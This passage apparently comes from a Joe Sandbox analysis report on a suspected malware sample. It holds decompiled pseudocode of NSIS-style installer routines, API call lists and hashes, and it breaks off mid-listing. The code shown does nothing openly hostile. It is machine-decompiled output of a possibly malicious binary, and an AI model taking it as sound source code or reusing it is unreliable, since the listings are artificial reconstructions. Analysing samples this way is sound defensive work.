                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Char$Next$Prev
                                                                                        • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                        • API String ID: 589700163-2977677972
                                                                                        • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                        • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                                                        • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                        • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
                                                                                        				long _v8;
                                                                                        				signed char _v12;
                                                                                        				unsigned int _v16;
                                                                                        				void* _v20;
                                                                                        				intOrPtr _v24;
                                                                                        				long _v56;
                                                                                        				void* _v60;
                                                                                        				long _t15;
                                                                                        				unsigned int _t19;
                                                                                        				signed int _t25;
                                                                                        				struct HWND__* _t28;
                                                                                        
                                                                                        				_t28 = _a4;
                                                                                        				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                                                        				if(_a8 == 0) {
                                                                                        					L4:
                                                                                        					_v56 = _t15;
                                                                                        					_v60 = 4;
                                                                                        					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                                                        					return _v24;
                                                                                        				}
                                                                                        				_t19 = GetMessagePos();
                                                                                        				_v16 = _t19 >> 0x10;
                                                                                        				_v20 = _t19;
                                                                                        				ScreenToClient(_t28,  &_v20);
                                                                                        				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                                                        				if((_v12 & 0x00000066) != 0) {
                                                                                        					_t15 = _v8;
                                                                                        					goto L4;
                                                                                        				}
                                                                                        				return _t25 | 0xffffffff;
                                                                                        			}














                                                                                        0x00404e62
                                                                                        0x00404e6f
                                                                                        0x00404e75
                                                                                        0x00404eb3
                                                                                        0x00404eb3
                                                                                        0x00404ec2
                                                                                        0x00404ec9
                                                                                        0x00000000
                                                                                        0x00404ecb
                                                                                        0x00404e77
                                                                                        0x00404e86
                                                                                        0x00404e8e
                                                                                        0x00404e91
                                                                                        0x00404ea3
                                                                                        0x00404ea9
                                                                                        0x00404eb0
                                                                                        0x00000000
                                                                                        0x00404eb0
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                                                        • GetMessagePos.USER32 ref: 00404E77
                                                                                        • ScreenToClient.USER32(?,?), ref: 00404E91
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$Send$ClientScreen
                                                                                        • String ID: f
                                                                                        • API String ID: 41195575-1993550816
                                                                                        • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                        • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                                                        • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                        • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                                                        				short _v132;
                                                                                        				int _t11;
                                                                                        				int _t20;
                                                                                        
                                                                                        				if(_a8 == 0x110) {
                                                                                        					SetTimer(_a4, 1, 0xfa, 0);
                                                                                        					_a8 = 0x113;
                                                                                        				}
                                                                                        				if(_a8 == 0x113) {
                                                                                        					_t20 =  *0x41ea18; // 0xf2c45
                                                                                        					_t11 =  *0x42aa24; // 0xf4448
                                                                                        					if(_t20 >= _t11) {
                                                                                        						_t20 = _t11;
                                                                                        					}
                                                                                        					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                                                        					SetWindowTextW(_a4,  &_v132);
                                                                                        					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                                        				}
                                                                                        				return 0;
                                                                                        			}






                                                                                        0x00402fa3
                                                                                        0x00402fb1
                                                                                        0x00402fb7
                                                                                        0x00402fb7
                                                                                        0x00402fc5
                                                                                        0x00402fc7
                                                                                        0x00402fcd
                                                                                        0x00402fd4
                                                                                        0x00402fd6
                                                                                        0x00402fd6
                                                                                        0x00402fec
                                                                                        0x00402ffc
                                                                                        0x0040300e
                                                                                        0x0040300e
                                                                                        0x00403016

                                                                                        APIs
                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                        • MulDiv.KERNEL32(000F2C45,00000064,000F4448), ref: 00402FDC
                                                                                        • wsprintfW.USER32 ref: 00402FEC
                                                                                        • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                                                        Strings
                                                                                        • verifying installer: %d%%, xrefs: 00402FE6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                        • String ID: verifying installer: %d%%
                                                                                        • API String ID: 1451636040-82062127
                                                                                        • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                        • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                                                        • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                        • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 75%
                                                                                        			E6FE02655() {
                                                                                        				intOrPtr _t24;
                                                                                        				void* _t26;
                                                                                        				intOrPtr _t27;
                                                                                        				signed int _t39;
                                                                                        				void* _t40;
                                                                                        				void* _t43;
                                                                                        				intOrPtr _t44;
                                                                                        				void* _t45;
                                                                                        
                                                                                        				_t40 = E6FE012BB();
                                                                                        				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                                                                                        				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                                                                                        				_t43 = (_t44 + 0x81 << 5) + _t24;
                                                                                        				do {
                                                                                        					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                                                                                        					}
                                                                                        					_t39 =  *(_t43 - 8) & 0x000000ff;
                                                                                        					if(_t39 <= 7) {
                                                                                        						switch( *((intOrPtr*)(_t39 * 4 +  &M6FE02784))) {
                                                                                        							case 0:
                                                                                        								 *_t40 = 0;
                                                                                        								goto L17;
                                                                                        							case 1:
                                                                                        								__eax =  *__eax;
                                                                                        								if(__ecx > __ebx) {
                                                                                        									 *(__esp + 0x10) = __ecx;
                                                                                        									__ecx =  *(0x6fe0407c + __edx * 4);
                                                                                        									__edx =  *(__esp + 0x10);
                                                                                        									__ecx = __ecx * __edx;
                                                                                        									asm("sbb edx, edx");
                                                                                        									__edx = __edx & __ecx;
                                                                                        									__eax = __eax &  *(0x6fe0409c + __edx * 4);
                                                                                        								}
                                                                                        								_push(__eax);
                                                                                        								goto L15;
                                                                                        							case 2:
                                                                                        								__eax = E6FE01510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                                                        								goto L16;
                                                                                        							case 3:
                                                                                        								__ecx =  *0x6fe0506c;
                                                                                        								__edx = __ecx - 1;
                                                                                        								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                                                                                        								__eax =  *0x6fe0506c;
                                                                                        								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                                                                                        								goto L17;
                                                                                        							case 4:
                                                                                        								__eax = lstrcpynW(__edi,  *__eax,  *0x6fe0506c);
                                                                                        								goto L17;
                                                                                        							case 5:
                                                                                        								_push( *0x6fe0506c);
                                                                                        								_push(__edi);
                                                                                        								_push( *__eax);
                                                                                        								__imp__StringFromGUID2();
                                                                                        								goto L17;
                                                                                        							case 6:
                                                                                        								_push( *__esi);
                                                                                        								L15:
                                                                                        								__eax = wsprintfW(__edi, 0x6fe05000);
                                                                                        								L16:
                                                                                        								__esp = __esp + 0xc;
                                                                                        								goto L17;
                                                                                        						}
                                                                                        					}
                                                                                        					L17:
                                                                                        					_t26 =  *(_t43 + 0x14);
                                                                                        					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                                                        						GlobalFree(_t26);
                                                                                        					}
                                                                                        					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                                                        					if(_t27 != 0) {
                                                                                        						if(_t27 != 0xffffffff) {
                                                                                        							if(_t27 > 0) {
                                                                                        								E6FE01381(_t27 - 1, _t40);
                                                                                        								goto L26;
                                                                                        							}
                                                                                        						} else {
                                                                                        							E6FE01312(_t40);
                                                                                        							L26:
                                                                                        						}
                                                                                        					}
                                                                                        					_t44 = _t44 - 1;
                                                                                        					_t43 = _t43 - 0x20;
                                                                                        				} while (_t44 >= 0);
                                                                                        				return GlobalFree(_t40);
                                                                                        			}











                                                                                        0x6fe0265f
                                                                                        0x6fe02661
                                                                                        0x6fe02665
                                                                                        0x6fe02674
                                                                                        0x6fe02678
                                                                                        0x6fe0267d
                                                                                        0x6fe0267d
                                                                                        0x6fe02685
                                                                                        0x6fe0268c
                                                                                        0x6fe02692
                                                                                        0x00000000
                                                                                        0x6fe02699
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe026a1
                                                                                        0x6fe026a5
                                                                                        0x6fe026a8
                                                                                        0x6fe026ac
                                                                                        0x6fe026b3
                                                                                        0x6fe026b7
                                                                                        0x6fe026bd
                                                                                        0x6fe026bf
                                                                                        0x6fe026c1
                                                                                        0x6fe026c1
                                                                                        0x6fe026c8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe026d1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe026d8
                                                                                        0x6fe026de
                                                                                        0x6fe026e8
                                                                                        0x6fe026ee
                                                                                        0x6fe026f3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe02714
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe026fa
                                                                                        0x6fe02700
                                                                                        0x6fe02701
                                                                                        0x6fe02703
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe0271c
                                                                                        0x6fe0271e
                                                                                        0x6fe02724
                                                                                        0x6fe0272a
                                                                                        0x6fe0272a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe02692
                                                                                        0x6fe0272d
                                                                                        0x6fe0272d
                                                                                        0x6fe02732
                                                                                        0x6fe02743
                                                                                        0x6fe02743
                                                                                        0x6fe02749
                                                                                        0x6fe0274e
                                                                                        0x6fe02753
                                                                                        0x6fe0275f
                                                                                        0x6fe02764
                                                                                        0x00000000
                                                                                        0x6fe02769
                                                                                        0x6fe02755
                                                                                        0x6fe02756
                                                                                        0x6fe0276a
                                                                                        0x6fe0276a
                                                                                        0x6fe02753
                                                                                        0x6fe0276b
                                                                                        0x6fe0276c
                                                                                        0x6fe0276f
                                                                                        0x6fe02783

                                                                                        APIs
                                                                                          • Part of subcall function 6FE012BB: GlobalAlloc.KERNELBASE(00000040,?,6FE012DB,?,6FE0137F,00000019,6FE011CA,-000000A0), ref: 6FE012C5
                                                                                        • GlobalFree.KERNEL32(?), ref: 6FE02743
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 6FE02778
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213854083572.000000006FE01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FE00000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213854032953.000000006FE00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213854145780.000000006FE04000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213854195381.000000006FE06000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_6fe00000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$Free$Alloc
                                                                                        • String ID:
                                                                                        • API String ID: 1780285237-0
                                                                                        • Opcode ID: be24974f30bb146089c5f36da96b0d43f3ead914e94a70daa695d7a6261a7e2d
                                                                                        • Instruction ID: 919547d24dd7590d7c79f6f5bf24bbc6bb2ebcf6ca6bb08cb685e1805533626d
                                                                                        • Opcode Fuzzy Hash: be24974f30bb146089c5f36da96b0d43f3ead914e94a70daa695d7a6261a7e2d
                                                                                        • Instruction Fuzzy Hash: 88311431505602DFDB25AF68CA84C2E7FF7FBA7318728022EF10097250C73268359B52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 86%
                                                                                        			E00402950(int __ebx, void* __eflags) {
                                                                                        				WCHAR* _t26;
                                                                                        				void* _t29;
                                                                                        				long _t37;
                                                                                        				int _t49;
                                                                                        				void* _t52;
                                                                                        				void* _t54;
                                                                                        				void* _t56;
                                                                                        				void* _t59;
                                                                                        				void* _t60;
                                                                                        				void* _t61;
                                                                                        
                                                                                        				_t49 = __ebx;
                                                                                        				_t52 = 0xfffffd66;
                                                                                        				_t26 = E00402DA6(0xfffffff0);
                                                                                        				_t55 = _t26;
                                                                                        				 *(_t61 - 0x40) = _t26;
                                                                                        				if(E00405E83(_t26) == 0) {
                                                                                        					E00402DA6(0xffffffed);
                                                                                        				}
                                                                                        				E00406008(_t55);
                                                                                        				_t29 = E0040602D(_t55, 0x40000000, 2);
                                                                                        				 *(_t61 + 8) = _t29;
                                                                                        				if(_t29 != 0xffffffff) {
                                                                                        					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                                                        					if( *(_t61 - 0x28) != _t49) {
                                                                                        						_t37 =  *0x434f14;
                                                                                        						 *(_t61 - 0x44) = _t37;
                                                                                        						_t54 = GlobalAlloc(0x40, _t37);
                                                                                        						if(_t54 != _t49) {
                                                                                        							E004034E5(_t49);
                                                                                        							E004034CF(_t54,  *(_t61 - 0x44));
                                                                                        							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                                                        							 *(_t61 - 0x10) = _t59;
                                                                                        							if(_t59 != _t49) {
                                                                                        								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                                                        								while( *_t59 != _t49) {
                                                                                        									_t60 = _t59 + 8;
                                                                                        									 *(_t61 - 0x3c) =  *_t59;
                                                                                        									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                                                        									_t59 = _t60 +  *(_t61 - 0x3c);
                                                                                        								}
                                                                                        								GlobalFree( *(_t61 - 0x10));
                                                                                        							}
                                                                                        							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                                                        							GlobalFree(_t54);
                                                                                        							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                                                        						}
                                                                                        					}
                                                                                        					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                                                        					CloseHandle( *(_t61 + 8));
                                                                                        				}
                                                                                        				_t56 = 0xfffffff3;
                                                                                        				if(_t52 < _t49) {
                                                                                        					_t56 = 0xffffffef;
                                                                                        					DeleteFileW( *(_t61 - 0x40));
                                                                                        					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                                                        				}
                                                                                        				_push(_t56);
                                                                                        				E00401423();
                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
                                                                                        				return 0;
                                                                                        			}













                                                                                        0x00402950
                                                                                        0x00402952
                                                                                        0x00402957
                                                                                        0x0040295c
                                                                                        0x0040295f
                                                                                        0x00402969
                                                                                        0x0040296d
                                                                                        0x0040296d
                                                                                        0x00402973
                                                                                        0x00402980
                                                                                        0x00402988
                                                                                        0x0040298b
                                                                                        0x00402997
                                                                                        0x0040299a
                                                                                        0x004029a0
                                                                                        0x004029ae
                                                                                        0x004029b3
                                                                                        0x004029b7
                                                                                        0x004029ba
                                                                                        0x004029c3
                                                                                        0x004029cf
                                                                                        0x004029d3
                                                                                        0x004029d6
                                                                                        0x004029e0
                                                                                        0x004029ff
                                                                                        0x004029ec
                                                                                        0x004029f4
                                                                                        0x004029f7
                                                                                        0x004029fc
                                                                                        0x004029fc
                                                                                        0x00402a06
                                                                                        0x00402a06
                                                                                        0x00402a13
                                                                                        0x00402a19
                                                                                        0x00402a1f
                                                                                        0x00402a1f
                                                                                        0x004029b7
                                                                                        0x00402a33
                                                                                        0x00402a35
                                                                                        0x00402a35
                                                                                        0x00402a3f
                                                                                        0x00402a40
                                                                                        0x00402a44
                                                                                        0x00402a48
                                                                                        0x00402a4e
                                                                                        0x00402a4e
                                                                                        0x00402a55
                                                                                        0x004022f1
                                                                                        0x00402c2d
                                                                                        0x00402c39

                                                                                        APIs
                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                        • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2667972263-0
                                                                                        • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                                        • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                                                        • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                                        • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 85%
                                                                                        			E6FE02480(void* __edx) {
                                                                                        				void* _t37;
                                                                                        				signed int _t38;
                                                                                        				void* _t39;
                                                                                        				void* _t41;
                                                                                        				signed char* _t42;
                                                                                        				signed char* _t51;
                                                                                        				void* _t52;
                                                                                        				void* _t54;
                                                                                        
                                                                                        				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                                                        				while(1) {
                                                                                        					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                                                        					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                                                        					_t52 = _t51[0x18];
                                                                                        					if(_t52 == 0) {
                                                                                        						goto L9;
                                                                                        					}
                                                                                        					_t41 = 0x1a;
                                                                                        					if(_t52 == _t41) {
                                                                                        						goto L9;
                                                                                        					}
                                                                                        					if(_t52 != 0xffffffff) {
                                                                                        						if(_t52 <= 0 || _t52 > 0x19) {
                                                                                        							_t51[0x18] = _t41;
                                                                                        							goto L12;
                                                                                        						} else {
                                                                                        							_t37 = E6FE0135A(_t52 - 1);
                                                                                        							L10:
                                                                                        							goto L11;
                                                                                        						}
                                                                                        					} else {
                                                                                        						_t37 = E6FE012E3();
                                                                                        						L11:
                                                                                        						_t52 = _t37;
                                                                                        						L12:
                                                                                        						_t13 =  &(_t51[8]); // 0x1020
                                                                                        						_t42 = _t13;
                                                                                        						if(_t51[4] >= 0) {
                                                                                        						}
                                                                                        						_t38 =  *_t51 & 0x000000ff;
                                                                                        						_t51[0x1c] = 0;
                                                                                        						if(_t38 > 7) {
                                                                                        							L27:
                                                                                        							_t39 = GlobalFree(_t52);
                                                                                        							if( *(_t54 + 0x10) == 0) {
                                                                                        								return _t39;
                                                                                        							}
                                                                                        							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                                                        								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                                                        							} else {
                                                                                        								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                                                        							}
                                                                                        							continue;
                                                                                        						} else {
                                                                                        							switch( *((intOrPtr*)(_t38 * 4 +  &M6FE025F8))) {
                                                                                        								case 0:
                                                                                        									 *_t42 = 0;
                                                                                        									goto L27;
                                                                                        								case 1:
                                                                                        									__eax = E6FE013B1(__ebp);
                                                                                        									goto L21;
                                                                                        								case 2:
                                                                                        									 *__edi = E6FE013B1(__ebp);
                                                                                        									__edi[1] = __edx;
                                                                                        									goto L27;
                                                                                        								case 3:
                                                                                        									__eax = GlobalAlloc(0x40,  *0x6fe0506c);
                                                                                        									 *(__esi + 0x1c) = __eax;
                                                                                        									__edx = 0;
                                                                                        									 *__edi = __eax;
                                                                                        									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x6fe0506c, __eax,  *0x6fe0506c, 0, 0);
                                                                                        									goto L27;
                                                                                        								case 4:
                                                                                        									__eax = E6FE012CC(__ebp);
                                                                                        									 *(__esi + 0x1c) = __eax;
                                                                                        									L21:
                                                                                        									 *__edi = __eax;
                                                                                        									goto L27;
                                                                                        								case 5:
                                                                                        									__eax = GlobalAlloc(0x40, 0x10);
                                                                                        									_push(__eax);
                                                                                        									 *(__esi + 0x1c) = __eax;
                                                                                        									_push(__ebp);
                                                                                        									 *__edi = __eax;
                                                                                        									__imp__CLSIDFromString();
                                                                                        									goto L27;
                                                                                        								case 6:
                                                                                        									if( *__ebp != __cx) {
                                                                                        										__eax = E6FE013B1(__ebp);
                                                                                        										 *__ebx = __eax;
                                                                                        									}
                                                                                        									goto L27;
                                                                                        								case 7:
                                                                                        									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                                                        									( *(__esi + 0x18) - 1) *  *0x6fe0506c =  *0x6fe05074 + ( *(__esi + 0x18) - 1) *  *0x6fe0506c * 2 + 0x18;
                                                                                        									 *__ebx =  *0x6fe05074 + ( *(__esi + 0x18) - 1) *  *0x6fe0506c * 2 + 0x18;
                                                                                        									asm("cdq");
                                                                                        									__eax = E6FE01510(__edx,  *0x6fe05074 + ( *(__esi + 0x18) - 1) *  *0x6fe0506c * 2 + 0x18, __edx,  *0x6fe05074 + ( *(__esi + 0x18) - 1) *  *0x6fe0506c * 2);
                                                                                        									goto L27;
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        					L9:
                                                                                        					_t37 = E6FE012CC(0x6fe05044);
                                                                                        					goto L10;
                                                                                        				}
                                                                                        			}











                                                                                        0x6fe02494
                                                                                        0x6fe02498
                                                                                        0x6fe024a3
                                                                                        0x6fe024a3
                                                                                        0x6fe024aa
                                                                                        0x6fe024af
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe024b3
                                                                                        0x6fe024b6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe024bb
                                                                                        0x6fe024c6
                                                                                        0x6fe024d6
                                                                                        0x00000000
                                                                                        0x6fe024cd
                                                                                        0x6fe024cf
                                                                                        0x6fe024e5
                                                                                        0x00000000
                                                                                        0x6fe024e5
                                                                                        0x6fe024bd
                                                                                        0x6fe024bd
                                                                                        0x6fe024e6
                                                                                        0x6fe024e6
                                                                                        0x6fe024e8
                                                                                        0x6fe024ec
                                                                                        0x6fe024ec
                                                                                        0x6fe024ef
                                                                                        0x6fe024ef
                                                                                        0x6fe024f7
                                                                                        0x6fe024ff
                                                                                        0x6fe02502
                                                                                        0x6fe025c1
                                                                                        0x6fe025c2
                                                                                        0x6fe025cd
                                                                                        0x6fe025f7
                                                                                        0x6fe025f7
                                                                                        0x6fe025dd
                                                                                        0x6fe025e9
                                                                                        0x6fe025df
                                                                                        0x6fe025df
                                                                                        0x6fe025df
                                                                                        0x00000000
                                                                                        0x6fe02508
                                                                                        0x6fe02508
                                                                                        0x00000000
                                                                                        0x6fe0250f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe02517
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe02525
                                                                                        0x6fe02527
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe02548
                                                                                        0x6fe0254e
                                                                                        0x6fe02551
                                                                                        0x6fe02553
                                                                                        0x6fe02563
